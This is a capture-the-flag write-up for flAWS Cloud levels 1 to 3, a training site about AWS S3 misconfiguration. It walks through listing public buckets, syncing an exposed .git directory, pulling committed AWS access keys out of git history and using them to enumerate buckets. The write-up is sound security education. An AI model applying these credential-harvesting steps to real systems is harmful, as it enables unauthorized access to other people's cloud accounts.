flAWS Cloud 1
These CTF write-ups contain spoilers
Written: 2021/08/14
These CTF challenges focus on misconfiguration and mistakes associated with using Amazon Web Services (AWS).
Level 1
Challenge notes
This level is buckets of fun. See if you can find the first sub-domain.
For this challenge, we are asked to find the next level’s sub-domain. The clue we get is it will be related to Amazon S3 buckets. Looking at flaws.cloud’s DNS records we can see that the domain is pointed at an IP address (52.218.220.162):
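```
# One way to reproduce the lookup with dig; S3 endpoint addresses
# rotate, so the IP returned may differ from the one noted above
dig +short A flaws.cloud
```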
Checking for CNAME records did not reveal anything interesting, but the IP address appears to belong to an S3 bucket. Trying to visit this IP address directly in the browser redirects us to the Amazon S3 site. Based on the hint about buckets, we can start exploring the idea that the site may be hosted as a static site within an S3 bucket. If this is the case, reviewing the Configuring a static website using a custom domain documentation comes in handy. Step 2 indicates the following: These bucket names must match your domain name exactly. Searching around for the domain structure of static sites hosted on AWS S3 buckets, I found this article on hosting a site on an S3 bucket, which led me to the following syntax:
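```
# General pattern for addressing a bucket over the S3 REST endpoint;
# <bucket-name> is a placeholder, and regional variants such as
# <bucket-name>.s3-<region>.amazonaws.com also exist
http://<bucket-name>.s3.amazonaws.com
```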
We already know that when hosting a static site, the bucket name will need to match the custom domain. Using the above formula, we can therefore try out the domain flaws.cloud.s3.amazonaws.com. In my experience, Amazon bucket information is displayed as an XML file. Going to the above site, that is exactly what we end up with.
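For reference, the same XML listing can be fetched from the command line; curl is just one option here:

```
# A publicly listable bucket returns a ListBucketResult XML document
curl http://flaws.cloud.s3.amazonaws.com/
```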
Flag
Following the link found in the bucket listing leads us to Level 2. The Level 2 page also provides some additional information on how to avoid exposing S3-hosted sites in a similar manner.
Level 2
Challenge notes
The next level is fairly similar, with a slight twist. You’re going to need your own AWS account for this. You just need the free tier.
This challenge starts off much like the first, but this time we are making use of an AWS account. I suspected this might be so we could use the AWS CLI. This is not something I had used a lot, so it was back to digging around documentation. I started with the Amazon configuration basics documentation for the AWS CLI, and this is where it became apparent why I needed an AWS account in the first place. According to the documentation, using aws configure we can set our AWS Access Key ID and AWS Secret Access Key along with a default region, which can then be used to connect to buckets. After setting up my own configuration based on the documentation and my own account, I tried the syntax suggested.
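A minimal sketch of that setup and the listing attempt; the bucket name below is a placeholder for the Level 2 sub-domain found at the end of Level 1:

```
# Store your own free-tier credentials in a CLI profile
aws configure

# List the bucket's contents with those credentials
# (<level2-subdomain> is a placeholder for the actual sub-domain)
aws s3 ls s3://<level2-subdomain>.flaws.cloud
```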
Flag
Much like the previous level, navigating to the third level gives us insight into what made it possible to list out the bucket's contents.
Level 3
Challenge notes
The next level is fairly similar, with a slight twist. Time to find your first AWS key! I bet you’ll find something that will let you list what other buckets are.
We are still on the s3 command trend, building on our knowledge from the earlier challenge about listing things out. The hint the notes give us is that we are looking for an AWS key and that we are going to try to list out other buckets. Much like in Level 1, we can try to see if the S3 bucket is accessible over the browser by using the bucket URL: level3-9afd3927f195e10225021a578e6f78df.flaws.cloud.s3.amazonaws.com.
Visiting this, we find that the bucket's settings are configured to allow everyone access without the need for keys. Looking through the bucket listing, I noticed that there was a .git directory:
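Since the bucket allows everyone access, the same listing can also be pulled through the AWS CLI without any credentials:

```
# --no-sign-request makes the request anonymously, matching the
# "everyone" access the bucket is configured with
aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ --no-sign-request
```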
This is extremely useful, as it may contain our key; alternatively, we can explore the commit history to see if a key was previously committed. To download the contents of the .git directory so we can browse through them with git locally, I found the article How to copy folder from s3 using aws cli very helpful.
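A sketch of the command based on that article; the local level3 directory name is my own choice:

```
# Recursively copy the exposed .git directory into a local folder so
# that git can operate on it
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git ./level3/.git --no-sign-request
```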
Running the above syncs the .git directory found in the Level 3 bucket. We can then start to explore the repo. I first searched through the commit history using git log:
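```
# Review the commit history from inside the synced directory
# (level3 being the local folder used in the sync above)
cd level3
git log
```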
It looks like right after the first commit, another one was made, noting that something was accidentally added that should not have been. We can now focus on seeing what was committed in the first commit:
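```
# Walk the object database by hand; the hashes are placeholders to be
# taken from the git log output
git cat-file -p <first-commit-hash>   # prints the commit, including its tree hash
git cat-file -p <tree-hash>           # lists the files in that commit
git cat-file -p <blob-hash>           # dumps a given file's contents
```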
By stepping through the git cat-file command, we are able to gather up the access_key and secret_access_key. The hint from the challenge notes indicates we may be able to list out other buckets using these keys. Following the steps to create a new profile, I created one using these keys.
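A sketch of that step, with flaws as an arbitrary profile name:

```
# Store the recovered keys under a separate named profile
aws configure --profile flaws
```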
I found that you can list the S3 buckets your keys have access to via the AWS CLI using the s3api list-buckets command.
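Using the profile created above:

```
# Enumerate every bucket the recovered keys are allowed to see
aws s3api list-buckets --profile flaws
```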